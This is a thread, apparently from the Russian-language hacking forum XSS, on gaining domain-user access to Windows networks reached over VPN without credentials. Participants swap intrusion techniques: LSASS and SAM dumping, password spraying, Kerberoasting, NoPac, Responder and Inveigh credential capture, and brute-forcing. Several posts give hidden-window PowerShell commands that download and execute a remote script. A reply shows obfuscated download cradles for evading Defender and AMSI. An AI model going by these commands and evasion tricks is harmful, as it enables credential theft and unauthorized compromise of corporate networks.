• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc Поднятие в домене до учётки юзера. NoCreds -> Domain user

Отслеживать
50cent сказал(а):
Если есть учетка локального админа, но lsaas дамп пуст - какие могут быть (помимо брута) варианты?
если есть локальный админ, то lsass что тебе то даст, если доменный админ туде не ходит. Нахер брут, если с локального поднять права можно попробовать. Брут это самое последнее и то не факт что там брутить получится и впн не отпадёт вовсе, спалят и еще куча нюансов
 
50cent сказал(а):
Какие способы есть поднятия прав с локального до доменного?
Дамп Lsass или Sam+Sys , если прав ни на что не хватает смотреть в сторону повышения привилегий. Способов много и в каждом случае все индивидуально.

Кто нибудь знает Responder будет работать в VPN сети или это исключено?
 
Lawyer сказал(а):
Дамп Lsass или Sam+Sys , если прав ни на что не хватает смотреть в сторону повышения привилегий. Способов много и в каждом случае все индивидуально.

Кто нибудь знает Responder будет работать в VPN сети или это исключено?
Будет, если вручную указать интерфейс VPN( responser -I tun0 например)
 
Octoberine сказал(а):
Спасибище. Что-то в самую первую сторону(на nmap) я не догадался посмотреть.
Хотя сам иногда https://nmap.org/nsedoc/scripts/ms-sql-brute.html использую. Оставлю сразу ещё https://github.com/NetSPI/PowerUpSQL , вдруг кому пригодится через MSSQL продвигаться.
Я на гитхабе посмотрел софт, просто там его относительно много и нужно тестить и смотреть что лучше, чётче и быстрее работает, хотел пропустить это и узнать какое-то популярное хорошее решение.
Надеюсь, ещё подскажет кто-то про Inveigh(тот же респондер, но на пш). Можно ли его заставить работать в сети, не заходя в домен.
Также добавлю в тему ссылку на https://github.com/byt3bl33d3r/CrackMapExec/ , через него тоже можно брутить сервисы. И ещё много чего делать.
По smb не даёт брутить обычно из за политики в сети, есть не много попыток, потом на минуту, потом на две, четыре... по прогрессии лочит ввод пароля и логина, а если использовать ms-sql-brute то такой беды нет?
 
50cent сказал(а):
Какие способы есть поднятия прав с локального до доменного?
Если есть креды, password spray по тачкам, ирл встречал много такого, достать юзеров через cme --users, и дальше распылять, как варик
 
Пожалуйста, обратите внимание, что пользователь заблокирован
c0v1d21 сказал(а):
Если есть креды тогда пробуй Kerberoast, Asreproast, NoPac.
>Кред нет, че делать
>Если креды есть, попробуй ....
Ебать спасибо
 
@seidziwhitehat
"Будет, если вручную указать интерфейс VPN( responser -I tun0 например)"

А ВПН клиент должен работать на тойже них что и респондер, или прокатить есль ВПН на винде а респондер например на кали на тойже машине через WSL
 
seidziwhitehat сказал(а):
Будет, если вручную указать интерфейс VPN( responser -I tun0 например)
у меня такое дело не работает( Доступ фортик, даю данную команду в терминал и весь день пустота. Сам даже пытался тестить, чтобы в респондер что-то прилетело - тишина. Может в /etc/resolv.conf надо дать айпишник ДНС сервера в сети?
 
sect adept сказал(а):
у меня такое дело не работает( Доступ фортик, даю данную команду в терминал и весь день пустота. Сам даже пытался тестить, чтобы в респондер что-то прилетело - тишина. Может в /etc/resolv.conf надо дать айпишник ДНС сервера в сети?
Респондеру не нужно прописывать nameserver в resolv'e. Eсть проблема с MTU, если работаешь из-под kali. Проверь респондер через crackmapexec, он будет одним из участников сети со странным именем: если он там есть, тогда пробуй или мту, или хз
 
sect adept сказал(а):
у меня такое дело не работает( Доступ фортик, даю данную команду в терминал и весь день пустота. Сам даже пытался тестить, чтобы в респондер что-то прилетело - тишина. Может в /etc/resolv.conf надо дать айпишник ДНС сервера в сети?
Большинство атак из респондера нацелены на L2, в то время как fortinet sslvpn - L3 VPN, если мне поменять не изменяет
 
есть пк в воркгруппе к которому нет учетки. на нем точно стоит фаерволл. есть идея запустить Inveigh.ps1 с виртуалке с которой конекчусь к впн. такой метод насколько работоспособен? и будет ли детектить ав где то по сети? так как знаю точно чло локально его скушает ав с алертами

как то давненько скрипт был таким

Код: 
# PowerShell.exe -windowstyle hidden IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));Invoke-Inveigh -ConsoleOutput Y -mDNS Y -NBNS Y -FileOutput Y -FileOutputDirectory C:\Users\marketing\Music\1
или

cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));Invoke-Inveigh -mDNS Y -NBNS Y -FileOutput Y -FileOutputDirectory C:\Users\marketing\Music\1
или

IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));

может появилось чтото более свежее?)
 
tuda сказал(а):
есть пк в воркгруппе к которому нет учетки. на нем точно стоит фаерволл. есть идея запустить Inveigh.ps1 с виртуалке с которой конекчусь к впн. такой метод насколько работоспособен? и будет ли детектить ав где то по сети? так как знаю точно чло локально его скушает ав с алертами

как то давненько скрипт был таким

Код: 
# PowerShell.exe -windowstyle hidden IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));Invoke-Inveigh -ConsoleOutput Y -mDNS Y -NBNS Y -FileOutput Y -FileOutputDirectory C:\Users\marketing\Music\1
или

cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));Invoke-Inveigh -mDNS Y -NBNS Y -FileOutput Y -FileOutputDirectory C:\Users\marketing\Music\1
или

IEX ((new-object net.webclient).downloadstring(' https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'));

может появилось чтото более свежее?)

сейчас работать не будет, скорее всего, defender + amsi уже давно умеют такое детектить + в самом загружаемом скрипте может быть подстава, из-за которой скрипт спалится. просто обфусцируй хорошо и протести на ав. примеры:
1)
Код: 
&('{1}{0}' -f 'EX','I')(&('{1}{0}{2}'-f 'Obje','New-','ct') ('{1}{4}{3}{0}{2}' -f'Clie','N','nt','t.Web','e')).('{1}{3}{0}{2}' -f 'trin','Downl','g','oadS').Invoke(*obfuscated-url*)
2)
Код: 
($shellid[1] + $shellid[3] + 'x')

эти работали несколько месяцев назад, но лучше додумать по типу
Код: 
`i`ex
или еще как-то
 
у кого нибуть получалось сбрутить пароли с kerbrute usernames, у меня или словари плохие, или что то не так делаю, ни разу не получил пасс.

Еще как вариант smb проверть:
smbmap --host-file list.txt
 
la-of-sh сказал(а):
у кого нибуть получалось сбрутить пароли с kerbrute usernames, у меня или словари плохие, или что то не так делаю, ни разу не получил пасс.

Еще как вариант smb проверть:
smbmap --host-file list.txt
Проверь уже на рабочем доступе к которому есть креды, выдаст ли кербрут
 
developer_ing сказал(а):
Проверь уже на рабочем доступе к которому есть креды, выдаст ли кербрут
Кредов нет
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет новую тему создавать не стал , может кто подсказать дальнейшие шаги если есть доступ к впн без доменной авторизации ?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх